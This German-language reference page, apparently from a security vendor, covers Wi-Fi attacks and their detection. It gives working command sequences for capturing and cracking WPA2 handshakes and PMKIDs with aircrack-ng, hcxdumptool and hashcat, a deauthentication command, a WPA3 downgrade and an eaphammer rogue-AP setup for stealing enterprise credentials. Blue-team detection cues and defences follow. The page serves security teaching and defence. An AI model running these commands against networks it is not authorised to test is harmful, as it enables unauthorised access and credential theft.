Neu Das Whitepaper zur kontinuierlichen Sicherheitsvalidierung 2026 ist verfügbar. Whitepaper lesen →
Referenz · 4 Operational Technology & Embedded

Wi-Fi — Angriff & Detektion.

Wireless-Angriffsfläche über WPA2/WPA3 und Enterprise-EAP-Varianten, mit praxisrelevanten Detektionsmerkmalen pro Technik.

WPA2-PSK — Handshake-Capture und Crack

  1. Monitor-Mode. airmon-ng check kill && airmon-ng start wlan0. Stoppt NetworkManager vom Kicken des Interfaces.
  2. Recon. airodump-ng wlan0mon. BSSID, Channel, connected Clients notieren.
  3. Targeted Capture. airodump-ng -c CH --bssid BSSID -w cap wlan0mon. Auf Handshake warten (organisch) oder einen Client deauthen: aireplay-ng --deauth 5 -a BSSID -c CLIENT wlan0mon.
  4. PMKID-Fallback. hcxdumptool -i wlan0mon -o cap.pcapng --enable_status=1. Single-Frame-Capture, keine Clients nötig wenn AP PMKID unterstützt.
  5. Konvertieren. hcxpcapngtool -o hash.hc22000 cap.pcapng.
  6. Cracken — Wordlist + Rule. hashcat -m 22000 hash.hc22000 rockyou.txt -r OneRuleToRuleThemAll.rule -O.
  7. Cracken — Mask. Wenn SSID-Convention bekannt einen Tel-Nummer-Suffix hat: hashcat -m 22000 hash.hc22000 -a 3 SSID?d?d?d?d?d?d?d.

WPA3 / SAE

  • Andere Form. SAE = Simultaneous Authentication of Equals. Kein Vier-Wege-Handshake zum Capturen; Offline-Brute ist nicht der Pfad.
  • Dragonblood-Downgrade. Erzwungener WPA2-Fallback in Transition-Mode (mixed WPA2/WPA3) → WPA2-Handshake capturen, normal cracken.
  • Side-Channel. Original Dragonblood-Timing-Side-Channel in modernem hostapd gepatcht, aber Konfigurations-Fehler-Varianten noch in Legacy-Embedded gesehen.
  • Verteidigung. WPA3-only-Mode (keine Transition). hostapd ≥ 2.10. WPA3 nicht auf Hardware, der die Side-Channel-Fixes fehlen.

Enterprise — EAP-Varianten

  • PEAP-MSCHAPv2 (häufigste, schwächste). Client sieht Server-Cert, validiert wenn konfiguriert. Misconfigured Client (kein CA-Pin, "Trust Any Cert" gesetzt) → Rogue-AP capturet Challenge/Response → offline NTLM-Hash brute.
  • EAP-TTLS-PAP. Klartext-Passwort im TLS-Tunnel. Gleicher Rogue-AP-Angriff → Klartext-Credentials direkt.
  • EAP-TLS. Mutual Cert-Auth. Kein Passwort zu capturen. Op-Kosten: PKI-Infrastruktur, Cert-Lifecycle. Am schwersten zu brechen, am leichtesten schlecht zu betreiben.
  • Rogue-AP-Toolchain. eaphammer -i wlan0mon --essid CORP --auth wpa-eap --creds stellt Rogue mit gleicher SSID + Cert auf. Client roamt.

Detektions-Merkmale fürs Blue-Team

  • Deauth-Frames. Floods von Management-Frame-Deauths von Non-AP-MACs. Wireless-IDS (Aruba, Cisco WIPS) detektiert.
  • Rogue-AP mit gleicher SSID. Signal-Strength-Anomalie: bekannte APs auf bekannten Etagen, plötzlich neuer AP mit gleicher SSID an unerwartetem Ort/Signal.
  • EAP von unerwarteten Supplicants. RADIUS-Logs zeigen EAP-Attempts von unbekannten Calling-Station-IDs (MAC).
  • PMKID-Requests. hcxdumptool-style PMKID-Probes hinterlassen erkennbares Muster in AP-Logs, wenn AP es exportiert.

Verteidigung — was tatsächlich funktioniert

  • PSK ≥ 20 random Zeichen. Sonst cracked rockyou+rules-Pass es.
  • WPA3-only. WPA2 droppen, wenn die Client-Flotte es unterstützt.
  • EAP-TLS oder PEAP mit strikter Client-Validation. Cert-Pin locken; jeden Cert nicht von deiner CA ablehnen. Lock testen, indem man Rogue mit Self-Signed aufstellt und bestätigt, dass Clients ablehnen.
  • MFP (Management Frame Protection). Schlägt Deauth-Attacks. 802.11w; default in WPA3, optional in WPA2.
  • Wireless-IDS deployed und getuned. Untuned WIDS ist Checkbox; getuned WIDS fängt Rogue-AP und Deauth-Floods.
FaustregelDie meisten Wireless-Wins kommen weiterhin aus misconfigured WPA2-Enterprise-Clients ("Trust Any Cert" der Bequemlichkeit halber an), nicht aus kryptografischen Schwächen. Die Client-seitige Trust-Konfiguration auditen, nicht nur das AP-seitige Protokoll.

Verwandte Notizen in dieser Domain

Von der Referenz zum Befund

Validieren Sie das in Ihrer eigenen Umgebung.